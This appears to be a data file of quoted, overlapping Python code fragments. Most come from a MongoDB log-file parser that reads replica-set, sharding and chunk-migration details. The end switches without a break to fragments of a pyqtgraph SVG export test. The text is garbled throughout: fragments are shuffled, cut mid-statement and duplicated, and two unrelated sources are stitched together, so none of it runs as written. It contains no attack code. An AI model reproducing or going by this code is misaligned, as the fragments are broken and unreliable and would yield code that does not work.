self.filehandle.seek(curr_pos, 0) if prev", "= match.group('namespace') moved_to = match.group('movedTo') note = match.group('note') if note", "beginning if not self.from_stdin: self.filehandle.seek(0) # return (instead of raising", "return the chunks moved to this shard (if available)\"\"\" if", "= 'wiredTiger' if \"command admin.$cmd command: { replSetInitiate:\" in line:", "self._has_level = True # find version string (fast check to", "filehandle.name self.from_stdin = filehandle.name == \"<stdin>\" self._bounds_calculated = False self._start", "[] self._rs_state = [] ln = 0 for ln, line", "timezone of logfile.\"\"\" if not self._timezone: self._calculate_bounds() return self._timezone @property", "v, _ in self.restarts: if len(versions) == 0 or v", "'mongos' in logevent.line_str): self._binary = 'mongos' else: return False version", "match: self._repl_set = match.group('replSet') match = re.search('engine: \"(?P<engine>\\S+)\"', line) if", "= 6 rs_state = ' '.join(tokens[pos:]) state = (host, rs_state,", "internal readahead # buffer so seek position is wrong line", "None for stdin input currently. \"\"\" if not self._start: self._calculate_bounds()", "re.search('errmsg: \"(?P<errmsg>.*)\"', line) if match: errmsg = match.group('errmsg') chunk_migration =", "line = self.filehandle.readline() if isinstance(line, bytes): line = line.decode('utf-8', 'replace')", "min(self.filehandle.tell(), 15000) self.filehandle.seek(-jump_back, 1) buff = self.filehandle.read(jump_back) self.filehandle.seek(curr_pos, 0) if", "chunk_range, moved_to, namespace, steps, note, errmsg) self._chunks_moved_from.append(chunk_migration) if \"moveChunk.to\" in", "if match: self._repl_set = match.group('replSet') self._repl_set_members = match.group('replSetMembers') # Replica", "= match.group(\"range\") namespace = match.group(\"namespace\") numSplits = 0 success =", "le = LogEvent(line) # hint format and nextpos from previous", "(if available)\"\"\" if not self._shards: self._find_sharding_info() return self._shards @property def", "line in enumerate(self.filehandle): if isinstance(line, bytes): line = line.decode(\"utf-8\", \"replace\")", "found a truly smaller line while self.filehandle.tell() >= 2 and", "if not self._num_lines: self._iterate_lines() return self._repl_set @property def repl_set_members(self): \"\"\"Return", "for lower bound while abs(step_size) > 100: step_size = ceil(step_size", "self.filehandle.seek(curr_pos, 0) if prev and self.prev_pos is not None and", "currently. \"\"\" if not self._start: self._calculate_bounds() return self._start @property def", "= self.next() except StopIteration as e: # end of log", "line) else: steps = None match = re.search('errmsg: \"(?P<errmsg>.*)\"', line)", "before/after the log offset error_context = 300 self.filehandle.seek(-error_context, 1) buff", "available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set @property def repl_set_members(self):", "LogEvent.log_levels and line[31:39].strip() in LogEvent.log_components): self._has_level = True # find", "return None if not self._num_lines: self._iterate_lines() return self._num_lines @property def", "= 2 else: pos = 6 rs_state = ' '.join(tokens[pos:])", "%s:\\n\\n%s\\n%s\\n\" \"<--- (current log parsing offset) \\n%s\\n%s\\n\" % (curr_pos, self.name,", "return (instead of raising StopIteration exception) per PEP 479 return", "self.from_stdin: return None if not self._filesize: self._calculate_bounds() return self._filesize @property", "\"Unable to auto-split chunk\" in line: logevent = LogEvent(line) match", "start_dt: self.filehandle.seek(0) return le = None self.filehandle.seek(0) # search for", "prev and self.prev_pos is not None and self.prev_pos == curr_pos:", "', line) if match: time = logevent.datetime split_range = match.group(\"range\")", "to show before/after the log offset error_context = 300 self.filehandle.seek(-error_context,", "not self.end and self.from_stdin: if le and le.datetime: self._end =", "= logevent.datetime self._timezone = logevent.datetime.tzinfo self._datetime_format = logevent.datetime_format self._datetime_nextpos =", "= self.filehandle.readline() if isinstance(line, bytes): line = line.decode('utf-8', 'replace') if", "self._chunks_moved_to = [] self._chunk_splits = [] prev_line = \"\" for", "= self._find_curr_line() if not le: break if le.datetime >= start_dt:", "# we should be able to find a valid log", "moved from this shard (if available)\"\"\" if not self._chunks_moved_from: self._find_sharding_info()", "stdin.\"\"\" self.filehandle = filehandle self.name = filehandle.name self.from_stdin = filehandle.name", "match.group('replSetVersion') match = re.search(', protocolVersion: (?P<replSetProtocol>\\d+), ', line) if match:", "= LogEvent(line) match = re.search(\"chunk \\[(?P<range>.*)\\) \" 'in namespace (?P<namespace>\\S+)'", "self._has_level = None # make sure bounds are calculated before", "self._calculate_bounds() @property def start(self): \"\"\" Lazy evaluation of start and", "prev=False): \"\"\" Internal helper function. Find the current (or previous", "smaller than first datetime self.filehandle.seek(0) le = self.next() if le.datetime", "not self._chunks_moved_to: self._find_sharding_info() return self._chunks_moved_to @property def chunks_moved_from(self): \"\"\"Lazily return", "return self.num_lines def _iterate_lines(self): \"\"\"Count number of lines (can be", "iterations start from the beginning if not self.from_stdin: self.filehandle.seek(0) #", "match: errmsg = match.group('errmsg') chunk_migration = (time, chunk_range, moved_from, namespace,", "self.from_stdin: if le and le.datetime: self._end = le.datetime # future", "@property def filesize(self): \"\"\" Lazy evaluation of start and end", "available)\"\"\" if not self._chunks_moved_to: self._find_sharding_info() return self._chunks_moved_to @property def chunks_moved_from(self):", "= ' '.join(tokens[pos:]) state = (host, rs_state, LogEvent(line)) self._rs_state.append(state) continue", "namespace = match.group('namespace') moved_to = match.group('movedTo') note = match.group('note') if", "+ self._port else: host = os.path.basename(self.name) host += ' (self)'", "'replace') if line == '': raise StopIteration line = line.rstrip('\\n')", "(self._has_level is None and line[28:31].strip() in LogEvent.log_levels and line[31:39].strip() in", "\"(?P<replSet>\\S+)\"', line) if match: self._repl_set = match.group('replSet') match = re.search('engine:", "stdin input currently. \"\"\" if not self._end: self._calculate_bounds() return self._end", "self._num_lines: self._iterate_lines() return self._repl_set_protocol @property def storage_engine(self): \"\"\"Return storage engine", "in a log file.\"\"\" return self.num_lines def _iterate_lines(self): \"\"\"Count number", "prev_line = \"\" for line in self.filehandle: if isinstance(line, bytes):", "time = logevent.datetime split_range = None namespace = match.group(\"namespace\") numSplits", "line: logevent = LogEvent(line) match = re.search('splitVector: \"(?P<namespace>\\S+)\".*,' ' (?P<range>min:.*),", "(instead of raising StopIteration exception) per PEP 479 return #", "(as it consumes the log line). \"\"\" if self.from_stdin: #", "time_taken, error)) elif \"Unable to auto-split chunk\" in line: logevent", "@property def repl_set_protocol(self): \"\"\"Return the replSet protocolVersion (if available).\"\"\" if", "datetime format.\"\"\" # use readline here because next() iterator uses", "# reset logfile self.filehandle.seek(0) def _check_for_restart(self, logevent): if (logevent.thread ==", "for line in self.filehandle: if isinstance(line, bytes): line = line.decode(\"utf-8\",", "= logevent.datetime.tzinfo self._datetime_format = logevent.datetime_format self._datetime_nextpos = logevent._datetime_nextpos break if", "format.\"\"\" if self._year_rollover is None: self._calculate_bounds() return self._year_rollover @property def", "Iterate over file and find any sharding related information \"\"\"", "(?P<namespace>\\S+)' ' :: caused by :: (?P<error>\\S+): ', line) if", "if self._datetime_format and self._datetime_nextpos is not None: ret = le.set_datetime_hint(self._datetime_format,", "@property def datetime_format(self): \"\"\"Lazy evaluation of the datetime format.\"\"\" if", "self._rs_state @property def binary(self): \"\"\"Lazy evaluation of the binary name.\"\"\"", "= line.decode(\"utf-8\", \"replace\") if (self._has_level is None and line[28:31].strip() in", "self._start = self._start.replace(year=self._start.year - 1) self._year_rollover = self._end else: self._year_rollover", "match.group('replSetMembers') # if (\"is now in state\" in line and", "moved_from, namespace, steps, note, errmsg) self._chunks_moved_to.append(chunk_migration) if \"Finding the split", "tokens[pos] rs_state = tokens[-1] state = (host, rs_state, LogEvent(line)) self._rs_state.append(state)", "else: pos = 6 rs_state = ' '.join(tokens[pos:]) state =", "vector for\" in line: logevent = LogEvent(line) match = re.search('for", "recalc bounds for lifetime of a Logfile object return if", "buff.rfind('\\n') if prev: newline_pos = buff[:newline_pos].rfind('\\n') # move back to", "= None if match: errmsg = match.group('errmsg') else: errmsg =", "\"\"\"Lazily return the chunks moved to this shard (if available)\"\"\"", "= re.search('{ _id: \"(?P<replSet>\\S+)\", ' 'members: (?P<replSetMembers>[^]]+ ])', line) if", "self._datetime_nextpos = logevent._datetime_nextpos break if lines_checked > max_start_lines: break #", "logfile has any level lines.\"\"\" if self._has_level is None: self._iterate_lines()", "= re.search('for (?P<namespace>\\S+).*' 'numSplits: (?P<numSplits>\\d+)', line) if match: time =", "from another logevent self._datetime_format = le.datetime_format self._datetime_nextpos = le._datetime_nextpos return", "match.group(\"namespace\") time_taken = match.group(\"time_taken\") numSplits = 0 success = True", "= match.group('range') namespace = match.group('namespace') moved_to = match.group('movedTo') note =", "logevent.datetime_format self._datetime_nextpos = logevent._datetime_nextpos break if lines_checked > max_start_lines: break", "the binary name.\"\"\" if not self._num_lines: self._iterate_lines() return self._binary @property", "self.end and self.from_stdin: if le and le.datetime: self._end = le.datetime", "# if there was a roll-over, subtract 1 year from", "self._hostname = None self._port = None self._rs_state = None self._repl_set", "return self._binary @property def hostname(self): \"\"\"Lazy evaluation of the binary", "= filehandle self.name = filehandle.name self.from_stdin = filehandle.name == \"<stdin>\"", "re.findall('(?P<steps>step \\d of \\d): (?P<stepTimes>\\d+)', line) else: steps = None", "= self.filesize step_size = max_mark # check if start_dt is", "self._repl_set_members = None self._repl_set_version = None self._repl_set_protocol = None self._storage_engine", "errmsg = None steps = re.findall('(?P<steps>step \\d of \\d): (?P<stepTimes>\\d+)',", "match.group('range') namespace = match.group('namespace') # TODO: alter this to find", "while abs(step_size) > 100: step_size = ceil(step_size / 2.) self.filehandle.seek(step_size,", "string (fast check to eliminate most lines) if \"version\" in", "was the storage engine. There were only two engines, MMAPv1", "forward until we found a line with a datetime try:", "time = logevent.datetime split_range = match.group(\"range\") namespace = match.group(\"namespace\") time_taken", "loop detected trying to find previous \" \"log line near", "as e: # end of log file, get end date", "# look for hostname, port match = re.search('port=(?P<port>\\d+).*host=(?P<host>\\S+)', line) if", "step_size = ceil(step_size / 2.) self.filehandle.seek(step_size, 1) le = self._find_curr_line()", "new replica set monitor for\" in line: if \"[mongosMain]\" in", "reached end of file return None def _find_sharding_info(self): \"\"\" Iterate", "line (generator). \"\"\" le = None while True: try: le", "return versions @property def repl_set(self): \"\"\"Return the replSet (if available).\"\"\"", "= (match.group('shardName'), match.group('replSetMembers')) self._shards.append(shard_info) elif self.binary == \"mongod\": logevent =", "'ROLLBACK', 'ARBITER', 'UNKNOWN']) def __len__(self): \"\"\"Return the number of lines", "curr_pos if isinstance(buff, bytes): buff = buff.decode(\"utf-8\", \"replace\") newline_pos =", "from start time if self._end < self._start: self._start = self._start.replace(year=self._start.year", "number of lines. Returns None for stdin input currently. \"\"\"", "\"\"\"Return all version changes.\"\"\" versions = [] for v, _", "file based on the current seek position. \"\"\" curr_pos =", "__future__ import print_function import os import re import sys from", "\"(?P<movedTo>\\S+)\".*note: \"(?P<note>\\S+)\"', line) if match: time = logevent.datetime chunk_range =", "time if self._end < self._start: self._start = self._start.replace(year=self._start.year - 1)", "match.group(\"namespace\") numSplits = match.group('numSplits') success = None time_taken = 0", "else: match = re.search(':: caused by :: (?P<errmsg>\\S+):', prev_line) steps", "for\" in line: if \"[mongosMain]\" in line: match = re.search(\"for", "and self._datetime_nextpos is not None: ret = le.set_datetime_hint(self._datetime_format, self._datetime_nextpos, self.year_rollover)", "elif le.datetime: # gather new hint info from another logevent", "None self._shards = None self._csrs = None self._chunks_moved_from = None", "\"version\" in line[:100]: logevent = LogEvent(line) restart = self._check_for_restart(logevent) if", "self._csrs = ( match.group('replSet'), match.group('replSetMembers') ) if \"Starting new replica", "StopIteration: # reached end of file return None def _find_sharding_info(self):", "_find_sharding_info(self): \"\"\" Iterate over file and find any sharding related", "line: match = re.search(\"for (?P<csrsName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match: csrs_info", "2.) self.filehandle.seek(step_size, 1) le = self._find_curr_line() if not le: break", "= False time_taken = 0 error = match.group(\"error\") self._chunk_splits.append((time, split_range,", "if \"Starting new replica set monitor for\" in line: match", "match = re.search(\"for (?P<replSet>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match: if self._csrs", "= le.datetime # future iterations start from the beginning if", "= filehandle.name self.from_stdin = filehandle.name == \"<stdin>\" self._bounds_calculated = False", "= match.group('replSetProtocol') match = re.search('members: (?P<replSetMembers>[^]]+ ])', line) if match:", "\"engine\" field if WiredTiger was the storage engine. There were", "prev: newline_pos = buff[:newline_pos].rfind('\\n') # move back to last newline", "match = re.search('ns: \"(?P<namespace>\\S+)\".*' 'details: { (?P<range>.*\\}).*.*note: \"(?P<note>\\S+)\"', line) if", "self.from_stdin: # skip lines until start_dt is reached return else:", "def timezone(self): \"\"\"Lazy evaluation of timezone of logfile.\"\"\" if not", "= None self._chunk_splits = None # Track previous file position", "invalidate hint info self._datetime_format = None self._datetime_nextpos = None elif", "+= 1 if logevent.datetime: self._start = logevent.datetime self._timezone = logevent.datetime.tzinfo", "input currently. \"\"\" if not self._end: self._calculate_bounds() return self._end @property", "line) if match: self._repl_set_members = match.group('replSetMembers') # if (\"is now", "\\n%s\\n%s\\n\" % (curr_pos, self.name, hr, buff[:error_context], buff[error_context:error_context + 1], hr),", "hostname(self): \"\"\"Lazy evaluation of the binary name.\"\"\" if not self._num_lines:", "None self._repl_set = None self._repl_set_members = None self._repl_set_version = None", "# if (\"is now in state\" in line and #", "in states if line.endswith(state))): if \"is now in state\" in", "not le: return # now walk backwards until we found", "else: errmsg = \"Unknown\" chunk_migration = (time, chunk_range, moved_to, namespace,", "raise SystemExit(\"Error: <%s> does not appear to be a supported", "host = os.path.basename(self.name) host += ' (self)' if tokens[-1] in", "backwards until we found a truly smaller line while self.filehandle.tell()", "= None elif le.datetime: # gather new hint info from", "\"(?P<replSet>\\S+)\".*' 'members: (?P<replSetMembers>[^]]+ ])', line) if match: self._csrs = (", "return version else: return False def _calculate_bounds(self): \"\"\"Calculate beginning and", "def fast_forward(self, start_dt): \"\"\" Fast-forward file to given start_dt datetime", "self.filehandle: if isinstance(line, bytes): line = line.decode(\"utf-8\", \"replace\") if self.binary", "\"\"\"Return storage engine if available.\"\"\" if not self._num_lines: self._iterate_lines() return", "except StopIteration as e: # end of log file, get", "le = None while True: try: le = self.next() except", "numSplits, success, time_taken, error)) elif \"jumbo\" in line: logevent =", "return self._filesize @property def datetime_format(self): \"\"\"Lazy evaluation of the datetime", "2.6 if tokens[1].endswith(']'): pos = 4 else: pos = 5" ]
[ "= pg.GraphicsWindow() #w.show() #p1 = w.addPlot() #p2 = w.addPlot() #p1.plot([1,3,2,3,1,6,9,8,4,2,3,5,3],", "#w.show() #p1 = w.addPlot() #p2 = w.addPlot() #p1.plot([1,3,2,3,1,6,9,8,4,2,3,5,3], pen={'color':'k'}) #p1.setXRange(0,5)", "app = pg.mkQApp() class SVGTest(test.TestCase): #def test_plotscene(self): #pg.setConfigOption('foreground', (0,0,0)) #w", "pg.GraphicsWindow() #w.show() #p1 = w.addPlot() #p2 = w.addPlot() #p1.plot([1,3,2,3,1,6,9,8,4,2,3,5,3], pen={'color':'k'})", "#rect.scale(0.5, 0.5) #rect1 = pg.QtGui.QGraphicsRectItem(0, 0, 100, 100) #rect1.setParentItem(rect) #rect1.setFlag(rect1.ItemIgnoresTransformations)", "pen={'color':'k', 'cosmetic':False, 'width': 0.3}) #app.processEvents() #app.processEvents() #ex = pg.exporters.SVGExporter.SVGExporter(w.scene()) #ex.export(fileName='test.svg')", "= pg.QtGui.QGraphicsRectItem(0, 0, 100, 100) #scene.addItem(rect) #rect.setPos(20,20) #rect.translate(50, 50) #rect.rotate(30)", "#grp.translate(200,0) ##grp.rotate(30) #rect2 = pg.QtGui.QGraphicsRectItem(0, 0, 100, 25) #rect2.setFlag(rect2.ItemClipsChildrenToShape) #rect2.setParentItem(grp)", "import pyqtgraph as pg app = pg.mkQApp() class SVGTest(test.TestCase): #def", "#scene.addItem(rect) #rect.setPos(20,20) #rect.translate(50, 50) #rect.rotate(30) #rect.scale(0.5, 0.5) #rect1 = pg.QtGui.QGraphicsRectItem(0,", "#rect = pg.QtGui.QGraphicsRectItem(0, 0, 100, 100) #scene.addItem(rect) #rect.setPos(20,20) #rect.translate(50, 50)", "= w.addPlot() #p1.plot([1,3,2,3,1,6,9,8,4,2,3,5,3], pen={'color':'k'}) #p1.setXRange(0,5) #p2.plot([1,5,2,3,4,6,1,2,4,2,3,5,3], pen={'color':'k', 'cosmetic':False, 'width': 0.3})", "#p1.plot([1,3,2,3,1,6,9,8,4,2,3,5,3], pen={'color':'k'}) #p1.setXRange(0,5) #p2.plot([1,5,2,3,4,6,1,2,4,2,3,5,3], pen={'color':'k', 'cosmetic':False, 'width': 0.3}) #app.processEvents() #app.processEvents()", "grp2.addItem(rect3) ex = pg.exporters.SVGExporter.SVGExporter(scene) ex.export(fileName='test.svg') if __name__ == '__main__': test.unittest.main()", "#rect2.setParentItem(grp) #rect2.setPos(0,25) #rect2.rotate(30) #el = pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 50) #el.translate(10,-5)", "import test import pyqtgraph as pg app = pg.mkQApp() class", "#el.scale(0.5,2) #el.setParentItem(rect2) grp2 = pg.ItemGroup() scene.addItem(grp2) grp2.scale(100,100) rect3 = pg.QtGui.QGraphicsRectItem(0,0,2,2)", "pg.QtGui.QGraphicsRectItem(0, 0, 100, 100) #rect1.setParentItem(rect) #rect1.setFlag(rect1.ItemIgnoresTransformations) #rect1.setPos(20, 20) #rect1.scale(2,2) #el1", "SVG export test \"\"\" import test import pyqtgraph as pg", "100) #rect1.setParentItem(rect) #rect1.setFlag(rect1.ItemIgnoresTransformations) #rect1.setPos(20, 20) #rect1.scale(2,2) #el1 = pg.QtGui.QGraphicsEllipseItem(0, 0,", "#rect1.setParentItem(rect) #rect1.setFlag(rect1.ItemIgnoresTransformations) #rect1.setPos(20, 20) #rect1.scale(2,2) #el1 = pg.QtGui.QGraphicsEllipseItem(0, 0, 100,", "0.5) #rect1 = pg.QtGui.QGraphicsRectItem(0, 0, 100, 100) #rect1.setParentItem(rect) #rect1.setFlag(rect1.ItemIgnoresTransformations) #rect1.setPos(20,", "= pg.QtGui.QGraphicsRectItem(0,0,2,2) rect3.setPen(pg.mkPen(width=1, cosmetic=False)) grp2.addItem(rect3) ex = pg.exporters.SVGExporter.SVGExporter(scene) ex.export(fileName='test.svg') if", "#el = pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 50) #el.translate(10,-5) #el.scale(0.5,2) #el.setParentItem(rect2) grp2", "\"\"\" SVG export test \"\"\" import test import pyqtgraph as", "'cosmetic':False, 'width': 0.3}) #app.processEvents() #app.processEvents() #ex = pg.exporters.SVGExporter.SVGExporter(w.scene()) #ex.export(fileName='test.svg') def", "#rect1.setPos(20, 20) #rect1.scale(2,2) #el1 = pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 100) #el1.setParentItem(rect1)", "#rect1.scale(2,2) #el1 = pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 100) #el1.setParentItem(rect1) ##grp =", "def test_simple(self): scene = pg.QtGui.QGraphicsScene() #rect = pg.QtGui.QGraphicsRectItem(0, 0, 100,", "20) #rect1.scale(2,2) #el1 = pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 100) #el1.setParentItem(rect1) ##grp", "100, 25) #rect2.setFlag(rect2.ItemClipsChildrenToShape) #rect2.setParentItem(grp) #rect2.setPos(0,25) #rect2.rotate(30) #el = pg.QtGui.QGraphicsEllipseItem(0, 0,", "#rect1 = pg.QtGui.QGraphicsRectItem(0, 0, 100, 100) #rect1.setParentItem(rect) #rect1.setFlag(rect1.ItemIgnoresTransformations) #rect1.setPos(20, 20)", "grp2.scale(100,100) rect3 = pg.QtGui.QGraphicsRectItem(0,0,2,2) rect3.setPen(pg.mkPen(width=1, cosmetic=False)) grp2.addItem(rect3) ex = pg.exporters.SVGExporter.SVGExporter(scene)", "100, 100) #el1.setParentItem(rect1) ##grp = pg.ItemGroup() #grp.setParentItem(rect) #grp.translate(200,0) ##grp.rotate(30) #rect2", "#rect2.rotate(30) #el = pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 50) #el.translate(10,-5) #el.scale(0.5,2) #el.setParentItem(rect2)", "100, 50) #el.translate(10,-5) #el.scale(0.5,2) #el.setParentItem(rect2) grp2 = pg.ItemGroup() scene.addItem(grp2) grp2.scale(100,100)", "= pg.QtGui.QGraphicsScene() #rect = pg.QtGui.QGraphicsRectItem(0, 0, 100, 100) #scene.addItem(rect) #rect.setPos(20,20)", "pg.exporters.SVGExporter.SVGExporter(w.scene()) #ex.export(fileName='test.svg') def test_simple(self): scene = pg.QtGui.QGraphicsScene() #rect = pg.QtGui.QGraphicsRectItem(0,", "#w = pg.GraphicsWindow() #w.show() #p1 = w.addPlot() #p2 = w.addPlot()", "scene.addItem(grp2) grp2.scale(100,100) rect3 = pg.QtGui.QGraphicsRectItem(0,0,2,2) rect3.setPen(pg.mkPen(width=1, cosmetic=False)) grp2.addItem(rect3) ex =", "#app.processEvents() #ex = pg.exporters.SVGExporter.SVGExporter(w.scene()) #ex.export(fileName='test.svg') def test_simple(self): scene = pg.QtGui.QGraphicsScene()", "25) #rect2.setFlag(rect2.ItemClipsChildrenToShape) #rect2.setParentItem(grp) #rect2.setPos(0,25) #rect2.rotate(30) #el = pg.QtGui.QGraphicsEllipseItem(0, 0, 100,", "test import pyqtgraph as pg app = pg.mkQApp() class SVGTest(test.TestCase):", "#el.translate(10,-5) #el.scale(0.5,2) #el.setParentItem(rect2) grp2 = pg.ItemGroup() scene.addItem(grp2) grp2.scale(100,100) rect3 =", "= pg.mkQApp() class SVGTest(test.TestCase): #def test_plotscene(self): #pg.setConfigOption('foreground', (0,0,0)) #w =", "pg.QtGui.QGraphicsScene() #rect = pg.QtGui.QGraphicsRectItem(0, 0, 100, 100) #scene.addItem(rect) #rect.setPos(20,20) #rect.translate(50,", "SVGTest(test.TestCase): #def test_plotscene(self): #pg.setConfigOption('foreground', (0,0,0)) #w = pg.GraphicsWindow() #w.show() #p1", "#grp.setParentItem(rect) #grp.translate(200,0) ##grp.rotate(30) #rect2 = pg.QtGui.QGraphicsRectItem(0, 0, 100, 25) #rect2.setFlag(rect2.ItemClipsChildrenToShape)", "#p1 = w.addPlot() #p2 = w.addPlot() #p1.plot([1,3,2,3,1,6,9,8,4,2,3,5,3], pen={'color':'k'}) #p1.setXRange(0,5) #p2.plot([1,5,2,3,4,6,1,2,4,2,3,5,3],", "0.3}) #app.processEvents() #app.processEvents() #ex = pg.exporters.SVGExporter.SVGExporter(w.scene()) #ex.export(fileName='test.svg') def test_simple(self): scene", "scene = pg.QtGui.QGraphicsScene() #rect = pg.QtGui.QGraphicsRectItem(0, 0, 100, 100) #scene.addItem(rect)", "#rect2.setFlag(rect2.ItemClipsChildrenToShape) #rect2.setParentItem(grp) #rect2.setPos(0,25) #rect2.rotate(30) #el = pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 50)", "#el1.setParentItem(rect1) ##grp = pg.ItemGroup() #grp.setParentItem(rect) #grp.translate(200,0) ##grp.rotate(30) #rect2 = pg.QtGui.QGraphicsRectItem(0,", "= pg.QtGui.QGraphicsRectItem(0, 0, 100, 25) #rect2.setFlag(rect2.ItemClipsChildrenToShape) #rect2.setParentItem(grp) #rect2.setPos(0,25) #rect2.rotate(30) #el", "50) #rect.rotate(30) #rect.scale(0.5, 0.5) #rect1 = pg.QtGui.QGraphicsRectItem(0, 0, 100, 100)", "as pg app = pg.mkQApp() class SVGTest(test.TestCase): #def test_plotscene(self): #pg.setConfigOption('foreground',", "(0,0,0)) #w = pg.GraphicsWindow() #w.show() #p1 = w.addPlot() #p2 =", "\"\"\" import test import pyqtgraph as pg app = pg.mkQApp()", "= pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 50) #el.translate(10,-5) #el.scale(0.5,2) #el.setParentItem(rect2) grp2 =", "= pg.QtGui.QGraphicsRectItem(0, 0, 100, 100) #rect1.setParentItem(rect) #rect1.setFlag(rect1.ItemIgnoresTransformations) #rect1.setPos(20, 20) #rect1.scale(2,2)", "#p2 = w.addPlot() #p1.plot([1,3,2,3,1,6,9,8,4,2,3,5,3], pen={'color':'k'}) #p1.setXRange(0,5) #p2.plot([1,5,2,3,4,6,1,2,4,2,3,5,3], pen={'color':'k', 'cosmetic':False, 'width':", "0, 100, 25) #rect2.setFlag(rect2.ItemClipsChildrenToShape) #rect2.setParentItem(grp) #rect2.setPos(0,25) #rect2.rotate(30) #el = pg.QtGui.QGraphicsEllipseItem(0,", "test_plotscene(self): #pg.setConfigOption('foreground', (0,0,0)) #w = pg.GraphicsWindow() #w.show() #p1 = w.addPlot()", "pg.ItemGroup() #grp.setParentItem(rect) #grp.translate(200,0) ##grp.rotate(30) #rect2 = pg.QtGui.QGraphicsRectItem(0, 0, 100, 25)", "rect3 = pg.QtGui.QGraphicsRectItem(0,0,2,2) rect3.setPen(pg.mkPen(width=1, cosmetic=False)) grp2.addItem(rect3) ex = pg.exporters.SVGExporter.SVGExporter(scene) ex.export(fileName='test.svg')", "100, 100) #scene.addItem(rect) #rect.setPos(20,20) #rect.translate(50, 50) #rect.rotate(30) #rect.scale(0.5, 0.5) #rect1", "pg app = pg.mkQApp() class SVGTest(test.TestCase): #def test_plotscene(self): #pg.setConfigOption('foreground', (0,0,0))", "#p1.setXRange(0,5) #p2.plot([1,5,2,3,4,6,1,2,4,2,3,5,3], pen={'color':'k', 'cosmetic':False, 'width': 0.3}) #app.processEvents() #app.processEvents() #ex =", "0, 100, 100) #el1.setParentItem(rect1) ##grp = pg.ItemGroup() #grp.setParentItem(rect) #grp.translate(200,0) ##grp.rotate(30)", "50) #el.translate(10,-5) #el.scale(0.5,2) #el.setParentItem(rect2) grp2 = pg.ItemGroup() scene.addItem(grp2) grp2.scale(100,100) rect3", "pg.QtGui.QGraphicsRectItem(0,0,2,2) rect3.setPen(pg.mkPen(width=1, cosmetic=False)) grp2.addItem(rect3) ex = pg.exporters.SVGExporter.SVGExporter(scene) ex.export(fileName='test.svg') if __name__", "class SVGTest(test.TestCase): #def test_plotscene(self): #pg.setConfigOption('foreground', (0,0,0)) #w = pg.GraphicsWindow() #w.show()", "w.addPlot() #p1.plot([1,3,2,3,1,6,9,8,4,2,3,5,3], pen={'color':'k'}) #p1.setXRange(0,5) #p2.plot([1,5,2,3,4,6,1,2,4,2,3,5,3], pen={'color':'k', 'cosmetic':False, 'width': 0.3}) #app.processEvents()", "grp2 = pg.ItemGroup() scene.addItem(grp2) grp2.scale(100,100) rect3 = pg.QtGui.QGraphicsRectItem(0,0,2,2) rect3.setPen(pg.mkPen(width=1, cosmetic=False))", "#el1 = pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 100) #el1.setParentItem(rect1) ##grp = pg.ItemGroup()", "= pg.ItemGroup() #grp.setParentItem(rect) #grp.translate(200,0) ##grp.rotate(30) #rect2 = pg.QtGui.QGraphicsRectItem(0, 0, 100,", "#rect.rotate(30) #rect.scale(0.5, 0.5) #rect1 = pg.QtGui.QGraphicsRectItem(0, 0, 100, 100) #rect1.setParentItem(rect)", "pg.QtGui.QGraphicsRectItem(0, 0, 100, 25) #rect2.setFlag(rect2.ItemClipsChildrenToShape) #rect2.setParentItem(grp) #rect2.setPos(0,25) #rect2.rotate(30) #el =", "#p2.plot([1,5,2,3,4,6,1,2,4,2,3,5,3], pen={'color':'k', 'cosmetic':False, 'width': 0.3}) #app.processEvents() #app.processEvents() #ex = pg.exporters.SVGExporter.SVGExporter(w.scene())", "#rect2 = pg.QtGui.QGraphicsRectItem(0, 0, 100, 25) #rect2.setFlag(rect2.ItemClipsChildrenToShape) #rect2.setParentItem(grp) #rect2.setPos(0,25) #rect2.rotate(30)", "#ex.export(fileName='test.svg') def test_simple(self): scene = pg.QtGui.QGraphicsScene() #rect = pg.QtGui.QGraphicsRectItem(0, 0,", "#pg.setConfigOption('foreground', (0,0,0)) #w = pg.GraphicsWindow() #w.show() #p1 = w.addPlot() #p2", "= pg.exporters.SVGExporter.SVGExporter(w.scene()) #ex.export(fileName='test.svg') def test_simple(self): scene = pg.QtGui.QGraphicsScene() #rect =", "#app.processEvents() #app.processEvents() #ex = pg.exporters.SVGExporter.SVGExporter(w.scene()) #ex.export(fileName='test.svg') def test_simple(self): scene =", "pyqtgraph as pg app = pg.mkQApp() class SVGTest(test.TestCase): #def test_plotscene(self):", "pg.mkQApp() class SVGTest(test.TestCase): #def test_plotscene(self): #pg.setConfigOption('foreground', (0,0,0)) #w = pg.GraphicsWindow()", "pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 50) #el.translate(10,-5) #el.scale(0.5,2) #el.setParentItem(rect2) grp2 = pg.ItemGroup()", "test_simple(self): scene = pg.QtGui.QGraphicsScene() #rect = pg.QtGui.QGraphicsRectItem(0, 0, 100, 100)", "pg.QtGui.QGraphicsEllipseItem(0, 0, 100, 100) #el1.setParentItem(rect1) ##grp = pg.ItemGroup() #grp.setParentItem(rect) #grp.translate(200,0)", "100) #el1.setParentItem(rect1) ##grp = pg.ItemGroup() #grp.setParentItem(rect) #grp.translate(200,0) ##grp.rotate(30) #rect2 =", "w.addPlot() #p2 = w.addPlot() #p1.plot([1,3,2,3,1,6,9,8,4,2,3,5,3], pen={'color':'k'}) #p1.setXRange(0,5) #p2.plot([1,5,2,3,4,6,1,2,4,2,3,5,3], pen={'color':'k', 'cosmetic':False,", "#ex = pg.exporters.SVGExporter.SVGExporter(w.scene()) #ex.export(fileName='test.svg') def test_simple(self): scene = pg.QtGui.QGraphicsScene() #rect", "export test \"\"\" import test import pyqtgraph as pg app", "0, 100, 50) #el.translate(10,-5) #el.scale(0.5,2) #el.setParentItem(rect2) grp2 = pg.ItemGroup() scene.addItem(grp2)", "#el.setParentItem(rect2) grp2 = pg.ItemGroup() scene.addItem(grp2) grp2.scale(100,100) rect3 = pg.QtGui.QGraphicsRectItem(0,0,2,2) rect3.setPen(pg.mkPen(width=1,", "0, 100, 100) #rect1.setParentItem(rect) 